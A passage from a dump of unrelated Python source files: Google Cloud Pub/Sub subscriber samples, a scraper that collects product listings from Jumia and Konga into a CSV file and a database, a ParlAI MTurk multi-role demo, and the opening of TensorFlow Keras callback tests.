streaming_pull_future = subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control
)
print("Listening for messages on {}..\n".format(subscription_path))
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
try:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
# [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id, subscription_id):
"""Pulling messages synchronously."""
# [START pubsub_subscriber_sync_pull]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
NUM_MESSAGES = 3
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
ack_ids = []
for received_message in response.received_messages:
print("Received: {}".format(received_message.message.data))
ack_ids.append(received_message.ack_id)
# Acknowledges the received messages so they will not be sent again.
subscriber.acknowledge(subscription_path, ack_ids)
print(
"Received and acknowledged {} messages. Done.".format(
len(response.received_messages)
)
)
# [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id, subscription_id):
"""Pulling messages synchronously with lease management"""
# [START pubsub_subscriber_sync_pull_with_lease]
import logging
import multiprocessing
import random
import time
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
NUM_MESSAGES = 2
ACK_DEADLINE = 30
SLEEP_TIME = 10
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
multiprocessing.log_to_stderr()
logger = multiprocessing.get_logger()
logger.setLevel(logging.INFO)
def worker(msg):
"""Simulates a long-running process."""
RUN_TIME = random.randint(1, 60)
logger.info(
"{}: Running {} for {}s".format(
time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME
)
)
time.sleep(RUN_TIME)
# `processes` stores process as key and ack id and message as values.
processes = dict()
for message in response.received_messages:
process = multiprocessing.Process(target=worker, args=(message,))
processes[process] = (message.ack_id, message.message.data)
process.start()
while processes:
for process in list(processes):
ack_id, msg_data = processes[process]
# If the process is still running, reset the ack deadline as
# specified by ACK_DEADLINE once every while as specified
# by SLEEP_TIME.
if process.is_alive():
# `ack_deadline_seconds` must be between 10 to 600.
subscriber.modify_ack_deadline(
subscription_path, [ack_id], ack_deadline_seconds=ACK_DEADLINE,
)
logger.info(
"{}: Reset ack deadline for {} for {}s".format(
time.strftime("%X", time.gmtime()), msg_data, ACK_DEADLINE,
)
)
# If the processs is finished, acknowledges using `ack_id`.
else:
subscriber.acknowledge(subscription_path, [ack_id])
logger.info(
"{}: Acknowledged {}".format(
time.strftime("%X", time.gmtime()), msg_data
)
)
processes.pop(process)
# If there are still processes running, sleeps the thread.
if processes:
time.sleep(SLEEP_TIME)
print(
"Received and acknowledged {} messages. Done.".format(
len(response.received_messages)
)
)
# Close the underlying gPRC channel. Alternatively, wrap subscriber in
# a 'with' block to automatically call close() when done.
subscriber.close()
# [END pubsub_subscriber_sync_pull_with_lease]
def listen_for_errors(project_id, subscription_id, timeout=None):
"""Receives messages and catches errors from a pull subscription."""
# [START pubsub_subscriber_error_listener]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
def callback(message):
print("Received message: {}".format(message))
message.ack()
streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
print("Listening for messages on {}..\n".format(subscription_path))
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
try:
streaming_pull_future.result(timeout=timeout)
except Exception as e:
streaming_pull_future.cancel()
print(
"Listening for messages on {} threw an exception: {}.".format(
subscription_id, e
)
)
# [END pubsub_subscriber_error_listener]
def receive_messages_with_delivery_attempts(project_id, subscription_id, timeout=None):
# [START pubsub_dead_letter_delivery_attempt]
from concurrent.futures import TimeoutError
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
def callback(message):
print("Received message: {}".format(message))
print("With delivery attempts: {}".format(message.delivery_attempt))
message.ack()
streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
print("Listening for messages on {}..\n".format(subscription_path))
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
try:
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
# [END pubsub_dead_letter_delivery_attempt]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("project_id", help="Your Google Cloud project ID")
subparsers = parser.add_subparsers(dest="command")
list_in_topic_parser = subparsers.add_parser(
"list-in-topic", help=list_subscriptions_in_topic.__doc__
)
list_in_topic_parser.add_argument("topic_id")
list_in_project_parser = subparsers.add_parser(
"list-in-project", help=list_subscriptions_in_project.__doc__
)
create_parser = subparsers.add_parser("create", help=create_subscription.__doc__)
create_parser.add_argument("topic_id")
create_parser.add_argument("subscription_id")
create_with_dead_letter_policy_parser = subparsers.add_parser(
"create-with-dead-letter-policy",
help=create_subscription_with_dead_letter_topic.__doc__,
)
create_with_dead_letter_policy_parser.add_argument("topic_id")
create_with_dead_letter_policy_parser.add_argument("subscription_id")
create_with_dead_letter_policy_parser.add_argument("dead_letter_topic_id")
create_push_parser = subparsers.add_parser(
"create-push", help=create_push_subscription.__doc__
)
create_push_parser.add_argument("topic_id")
create_push_parser.add_argument("subscription_id")
create_push_parser.add_argument("endpoint")
delete_parser = subparsers.add_parser("delete", help=delete_subscription.__doc__)
delete_parser.add_argument("subscription_id")
update_push_parser = subparsers.add_parser(
"update-push", help=update_push_subscription.__doc__
)
update_push_parser.add_argument("topic_id")
update_push_parser.add_argument("subscription_id")
update_push_parser.add_argument("endpoint")
update_dead_letter_policy_parser = subparsers.add_parser(
"update-dead-letter-policy",
help=update_subscription_with_dead_letter_policy.__doc__,
)
update_dead_letter_policy_parser.add_argument("topic_id")
update_dead_letter_policy_parser.add_argument("subscription_id")
update_dead_letter_policy_parser.add_argument("dead_letter_topic_id")
remove_dead_letter_policy_parser = subparsers.add_parser(
"remove-dead-letter-policy", help=remove_dead_letter_policy.__doc__
)
remove_dead_letter_policy_parser.add_argument("topic_id")
remove_dead_letter_policy_parser.add_argument("subscription_id")
receive_parser = subparsers.add_parser("receive", help=receive_messages.__doc__)
receive_parser.add_argument("subscription_id")
receive_parser.add_argument("timeout", default=None, type=float, nargs="?")
receive_with_custom_attributes_parser = subparsers.add_parser(
"receive-custom-attributes",
help=receive_messages_with_custom_attributes.__doc__,
)
receive_with_custom_attributes_parser.add_argument("subscription_id")
receive_with_custom_attributes_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
receive_with_flow_control_parser = subparsers.add_parser(
"receive-flow-control", help=receive_messages_with_flow_control.__doc__
)
receive_with_flow_control_parser.add_argument("subscription_id")
receive_with_flow_control_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
synchronous_pull_parser = subparsers.add_parser(
"receive-synchronously", help=synchronous_pull.__doc__
)
synchronous_pull_parser.add_argument("subscription_id")
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
"receive-synchronously-with-lease",
help=synchronous_pull_with_lease_management.__doc__,
)
synchronous_pull_with_lease_management_parser.add_argument("subscription_id")
listen_for_errors_parser = subparsers.add_parser(
"listen-for-errors", help=listen_for_errors.__doc__
)
listen_for_errors_parser.add_argument("subscription_id")
listen_for_errors_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
receive_messages_with_delivery_attempts_parser = subparsers.add_parser(
"receive-messages-with-delivery-attempts",
help=receive_messages_with_delivery_attempts.__doc__,
)
receive_messages_with_delivery_attempts_parser.add_argument("subscription_id")
receive_messages_with_delivery_attempts_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
args = parser.parse_args()
if args.command == "list-in-topic":
list_subscriptions_in_topic(args.project_id, args.topic_id)
elif args.command == "list-in-project":
list_subscriptions_in_project(args.project_id)
elif args.command == "create":
create_subscription(args.project_id, args.topic_id, args.subscription_id)
elif args.command == "create-with-dead-letter-policy":
create_subscription_with_dead_letter_topic(
args.project_id,
args.topic_id,
args.subscription_id,
args.dead_letter_topic_id,
)
elif args.command == "create-push":
create_push_subscription(
args.project_id, args.topic_id, args.subscription_id, args.endpoint,
)
elif args.command == "delete":
delete_subscription(args.project_id, args.subscription_id)
elif args.command == "update-push":
update_push_subscription(
args.project_id, args.topic_id, args.subscription_id, args.endpoint,
)
elif args.command == "update-dead-letter-policy":
update_subscription_with_dead_letter_policy(
args.project_id,
args.topic_id,
args.subscription_id,
args.dead_letter_topic_id,
)
elif args.command == "remove-dead-letter-policy":
remove_dead_letter_policy(args.project_id, args.topic_id, args.subscription_id)
elif args.command == "receive":
receive_messages(args.project_id, args.subscription_id, args.timeout)
elif args.command == "receive-custom-attributes":
receive_messages_with_custom_attributes(
args.project_id, args.subscription_id, args.timeout
)
elif args.command == "receive-flow-control":
receive_messages_with_flow_control(
args.project_id, args.subscription_id, args.timeout
)
elif args.command == "receive-synchronously":
synchronous_pull(args.project_id, args.subscription_id)
elif args.command == "receive-synchronously-with-lease":
synchronous_pull_with_lease_management(args.project_id, args.subscription_id)
elif args.command == "listen-for-errors":
listen_for_errors(args.project_id, args.subscription_id, args.timeout)
elif args.command == "receive-messages-with-delivery-attempts":
receive_messages_with_delivery_attempts(
args.project_id, args.subscription_id, args.timeout
)
|
scrape.py |
"""
Scrape data from Jumia and Konga.
Add data to file.
Add data to database.
"""
from flask import Flask
from requests_html import HTML, HTMLSession
from time import perf_counter
from multiprocessing import Process
from csv import writer
from simplified.scrape.models import *
import os
app = Flask(__name__)
#database configuration
app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.init_app(app)
session = HTMLSession()
def jumia(categ, url, test=False):
""" Scrapes jumia products """
print(f"scrapping {categ} on {url}")
#list params
name = ""
sku = ""
price = ""
stars = 0
link = ""
image_url = ""
reviews = 0
seller = "jumia"
category = categ
description = ""
counter = 0
score = 0
#scrape
initial = session.get(url)
if (initial.status_code == 200):
rawcount = initial.html.find("body > main > section.osh-content > section.pagination > ul > li:nth-child(5) > a", first=True)
count = int(rawcount.text)
if (test == True):
return True
for i in range(count):
response = session.get(f"{url}?page={i+1}")
if (response.status_code == 200):
try:
section = response.html.find(".products", first=True)
products = section.find(".sku")
except Exception as e:
continue
for product in products:
counter += 1
try:
#get sku
sku = product.attrs['data-sku']
except Exception as e:
continue
linker = product.find(".link", first=True)
try:
#get link
link = linker.attrs['href']
except Exception as e:
continue
title = linker.find(".title", first=True)
brand = title.find(".brand", first=True).text
prename = title.find(".name", first=True).text
#get name
name = f"{brand} {prename}"
price_container = linker.find(".price-container", first=True)
price_box = price_container.find(".price-box", first=True)
pricer = price_box.find(".price", first=True)
#get price
price = pricer.text.strip("₦").strip(" ")
try:
rating_stars = linker.find(".rating-stars", first=True)
total_ratings = rating_stars.find(".total-ratings", first=True)
rawreview = int(total_ratings.text.strip("(").strip(")"))
if (rawreview < 1):
continue
else:
#get reviews
reviews = rawreview
except Exception as e:
continue
each = session.get(link)
if (each.status_code == 200):
main_imgs = each.html.find(".sldr", first=True)
try:
a_imgs = main_imgs.find("a", first=True)
imgs = a_imgs.find("img", first=True)
except Exception as e:
continue
#get image_url
image_url = imgs.attrs['data-src']
features = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section.card.aim.-mtm.-fs16 > div.row.-pas > article:nth-child(1)", first=True)
new = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section.card.aim.-mtm.-fs16 > div.row.-pas > article:nth-child(2) > div", first=True)
try:
#get description
describe = f"{features.text}\n{new.text}"
description = describe.strip(" ").lstrip("Key Features").replace("\n", "\t")
except Exception as e:
continue
rawstar = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section:nth-child(5) > div.row.-fw-nw > div.col4.-phm > div > div.-fs29.-yl5.-pvxs > span", first=True)
try:
if (float(rawstar.text) < float(2.5)):
continue
else:
#get stars
stars = float(rawstar.text)
score += 1
each = [name, sku, price, stars, link, image_url, reviews, seller, category, description]
#write to file
try:
with open("products.csv", 'a', encoding="utf-8") as product_file:
product_filewrite = writer(product_file)
product_filewrite.writerow(each)
print(f"-> SUCS fileWRITE-> write successfully Jumia | {categ} | {name[0:10]} to file...")
except Exception as e:
print(f"-> ERR fileWRITE-> could not add Jumia|{categ}|{name[0:10]} to file: {e}")
#write to database
try:
with app.app_context():
item = Products(name=name, sku=sku, price=price, stars=stars, link=link, image_url=image_url, reviews=reviews, seller=seller, category=category, description=description)
db.session.add(item)
db.session.commit()
print(f"-> SUCS dbADD-> added successfully Jumia|{categ}|{name[0:10]} to database")
except Exception as e:
print(f"-> ERR dbADD-> could not add Jumia|{categ}|{name[0:10]} to database: {e}")
except Exception as e:
continue
print(f"-> END: Jumia | {categ} | counts: {score} of {counter}")
def konga(categ, url, test=False):
""" Scrapes konga products """
print(f"scrapping {categ} on {url}")
#list params
name = ""
sku = ""
price = ""
stars = 0
link = ""
image_url = ""
reviews = 0
seller = "konga"
category = categ
description = ""
counter = 0
score = 0
#scrape
initial = session.get(url)
if (initial.status_code == 200):
rawcount = initial.html.find("#mainContent > section._9cac3_2I9l4 > section > section > div > ul > li:nth-child(4) > a", first=True)
count = int(rawcount.text)
if (test == True):
return True
for i in range(count):
response = session.get(f"{url}?page={i+1}")
if (response.status_code == 200):
section = response.html.find("#mainContent > section._9cac3_2I9l4 > section > section > section > section > ul", first=True)
products = section.find("li")
for product in products:
each = product.find("div", first=True)
next_each = each.find("div", first=True)
diver = next_each.find("div", first=True)
linker = diver.find("a", first=True)
#get link
link = f"https://www.konga.com{linker.attrs['href']}"
next_down_each = next_each.find("._4941f_1HCZm", first=True)
former = next_down_each.find("form", first=True)
reviewer = former.find(".ccc19_2IYt0", first=True)
next_deep = reviewer.find('.a455c_3G0na', first=True)
deep_span = next_deep.find('.eea9b_1Ma8-', first=True)
counter += 1
if deep_span.text.strip("(").strip(")") == "No reviews yet":
continue
else:
#get reviews
reviews = int(deep_span.text.strip("Review").strip("Reviews").strip(" "))
if reviews < 1:
continue
each = session.get(link)
if (each.status_code == 200):
namer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > h4", first=True)
#get name
name = namer.text
skuer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._31c33_NSdat > div._97fc0_3W515.b50e0_1HOLM > span", first=True)
#get sku
sku = skuer.text
pricer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._3924b_1USC3._16f96_38E1t > div._3924b_1USC3 > div._678e4_e6nqh", first=True)
#get price
price = pricer.text.strip("₦")
imager = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT", first=True)
pictr = imager.find(".bf1a2_3kz7s", first=True).find("._3a8a4_3Bhwv", first=True).find(".fd8e9_1qWnZ", first=True)
pictr = pictr.find("._7f96a_3PgMp", first=True)
pictr = pictr.find("img", first=True)
#get image_url
image_url = pictr.attrs['src']
#get description
describe = each.html.find("#mainContent > div > div.d9549_IlL3h > div._227af_AT9tO > div._79826_3-pAs > div._3383f_1xAuk > div > div", first=True).text
description = describe.strip(" ").replace("\n", "\t")
starer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._31c33_NSdat > div.a455c_3G0na.af1a1_3wVPH", first=True)
try:
starcount = 0
svgs = starer.find("svg")
for svg in svgs:
if (svg.attrs['class'][0] == "ba6f2_18Jb4"):
starcount += 1
#get stars
stars = starcount
score += 1
each = [name, sku, price, stars, link, image_url, reviews, seller, category, description]
#write to file
try:
with open("products.csv", 'a', encoding="utf-8") as product_file:
product_filewrite = writer(product_file)
product_filewrite.writerow(each)
print(f"-> SUCS fileWRITE-> write successfully Konga | {categ} | {name[0:10]} to file...")
except Exception as e:
print(f"-> ERR fileWRITE-> could not add Konga|{categ}|{name[0:10]} to file: {e}")
#write to database
try:
with app.app_context():
item = Products(name=name, sku=sku, price=price, stars=stars, link=link, image_url=image_url, reviews=reviews, seller=seller, category=category, description=description)
db.session.add(item)
db.session.commit()
print(f"-> SUCS dbADD-> added successfully Konga|{categ}|{name[0:10]} to database")
except Exception as e:
print(f"-> ERR dbADD-> could not add Konga|{categ}|{name[0:10]} to database: {e}")
except Exception as e:
continue
print(f"-> END: konga | {categ} | counts: {score} of {counter}")
if __name__ == '__main__':
#start timer
start = perf_counter()
#drop all rows in Products table
with app.app_context():
try:
Products.query.delete()
db.session.commit()
print("Database Products Table cleared successfully")
except Exception as e:
print(f"Could not delete rows in Products table: {e}")
#asynchronous
#jumia #konga
jumia_fashion = Process(target=jumia, args=["fashion", "https://www.jumia.com.ng/category-fashion-by-jumia/"])
konga_computing = Process(target=konga, args=["computing", "https://www.konga.com/category/computers-accessories-5227"])
konga_electronics = Process(target=konga, args=["electronics", "https://www.konga.com/category/electronics-5261"])
konga_fashion = Process(target=konga, args=["fashion", "https://www.konga.com/category/konga-fashion-1259"])
jumia_health_beauty = Process(target=jumia, args=["health and beauty", "https://www.jumia.com.ng/health-beauty/"])
jumia_home_office = Process(target=jumia, args=["home and office", "https://www.jumia.com.ng/home-office/"])
konga_health_beauty = Process(target=konga, args=["health and beauty", "https://www.konga.com/category/beauty-health-personal-care-4"])
jumia_electronics = Process(target=jumia, args=["electronics", "https://www.jumia.com.ng/electronics/"])
konga_home_office = Process(target=konga, args=["home and office", "https://www.konga.com/category/home-kitchen-602"])
jumia_phones_tablets = Process(target=jumia, args=["phones and tablets", "https://www.jumia.com.ng/phones-tablets/"])
konga_phones_tablets = Process(target=konga, args=["phones and tablets", "https://www.konga.com/category/phones-tablets-5294"])
jumia_computing = Process(target=jumia, args=["computing", "https://www.jumia.com.ng/computing/"])
#start processes
jumia_fashion.start()
konga_fashion.start()
jumia_electronics.start()
konga_health_beauty.start()
jumia_health_beauty.start()
konga_computing.start()
jumia_computing.start()
konga_home_office.start()
konga_phones_tablets.start()
jumia_home_office.start()
konga_electronics.start()
jumia_phones_tablets.start()
#write to file
each = ["name", "sku", "price", "stars", "link", "image_url", "reviews", "seller", "category", "description"]
with open("products.csv", 'w', encoding="utf-8") as product_file:
product_filewrite = writer(product_file)
product_filewrite.writerow(each)
#join processes
jumia_computing.join()
konga_computing.join()
konga_electronics.join()
jumia_electronics.join()
jumia_fashion.join()
konga_fashion.join()
konga_health_beauty.join()
jumia_health_beauty.join()
konga_home_office.join()
konga_phones_tablets.join()
jumia_home_office.join()
jumia_phones_tablets.join()
#Total number of rows in product table
with app.app_context():
print("TOTAL PRODUCTS: ", Products.query.count())
#end timer
end = perf_counter()
print(f"time: {round((end - start) / 60, 2)}mins") |
worlds.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.mturk.core.worlds import MTurkOnboardWorld, MTurkTaskWorld
import threading
class AskerOnboardingWorld(MTurkOnboardWorld):
"""
Example onboarding world.
Sends a message from the world to the worker and then exits as complete after the
worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the asker. Ask "
"a question that can be answered with just a number. Send any "
"message to continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class AnswererOnboardingWorld(MTurkOnboardWorld):
"""
Example onboarding world.
Sends a message from the world to the worker and then exits as complete after the
worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the answerer. "
"You'll be asked a question that should be answered with a number. "
"Answer with something that makes sense. Enter any number to "
"continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class EvaluatorOnboardingWorld(MTurkOnboardWorld):
"""
Example onboarding world.
Sends a message from the world to the worker and then exits as complete after the
worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the evaluator. You'll "
"observe a series of three questions, and then you'll evaluate "
"whether or not the exchange was accurate. Send an eval to begin."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class MultiRoleAgentWorld(MTurkTaskWorld):
"""
World to demonstrate workers with assymetric roles.
This task amounts to three rounds and then an evaluation step. It is purposefully
created as a task to demo multiple views and has no other purpose.
"""
collector_agent_id = 'Moderator'
def __init__(self, opt, mturk_agents):
self.mturk_agents = mturk_agents
for agent in mturk_agents:
if agent.demo_role == 'Asker':
self.asker = agent
elif agent.demo_role == 'Answerer':
self.answerer = agent
else: # 'Evaluator'
self.evaluator = agent
self.episodeDone = False
self.turns = 0
self.questions = []
self.answers = []
self.accepted = None
def parley(self):
if self.turns == 0:
# Instruction for evaluator
ad = {'id': 'System', 'text': "Please observe the chat for accuracy."}
self.evaluator.observe(ad)
if self.turns < 3:
# QA pairing
ad = {
'id': 'System',
'text': "Please ask a question with a numeric answer.",
}
self.asker.observe(ad)
question = self.asker.act()
ad = {'id': 'System', 'text': 'Please answer this question.'}
self.answerer.observe(ad)
self.answerer.observe(question)
self.evaluator.observe(question)
answer = self.answerer.act()
self.evaluator.observe(answer)
self.asker.observe(answer)
self.questions.append(question)
self.answers.append(answer)
self.turns += 1
else:
# evaluate
ad = {'id': 'System', 'text': "Please provide your evaluation."}
self.evaluator.observe(ad)
ad = {'id': 'System', 'text': "Please wait for evaluation."}
self.answerer.observe(ad)
self.asker.observe(ad)
self.accepter = self.evaluator.act()
self.episodeDone = True
def episode_done(self):
return self.episodeDone
def shutdown(self):
# Parallel shutdown of agents
def shutdown_agent(agent):
try:
agent.shutdown(timeout=None)
except Exception:
agent.shutdown() # not MTurkAgent
threads = []
for agent in self.mturk_agents:
t = threading.Thread(target=shutdown_agent, args=(agent,))
t.start()
threads.append(t)
for t in threads:
t.join()
def review_work(self):
# Can review the work here to accept or reject it
pass
def get_custom_task_data(self):
# brings important data together for the task, to later be used for
# creating the dataset. If data requires pickling, put it in a field
# called 'needs-pickle'.
return {
'questions': self.questions,
'answers': self.answers,
'evaluation': self.accepted,
}
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2 if not is_sequence else None,
steps_per_epoch=5 if is_sequence else None,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
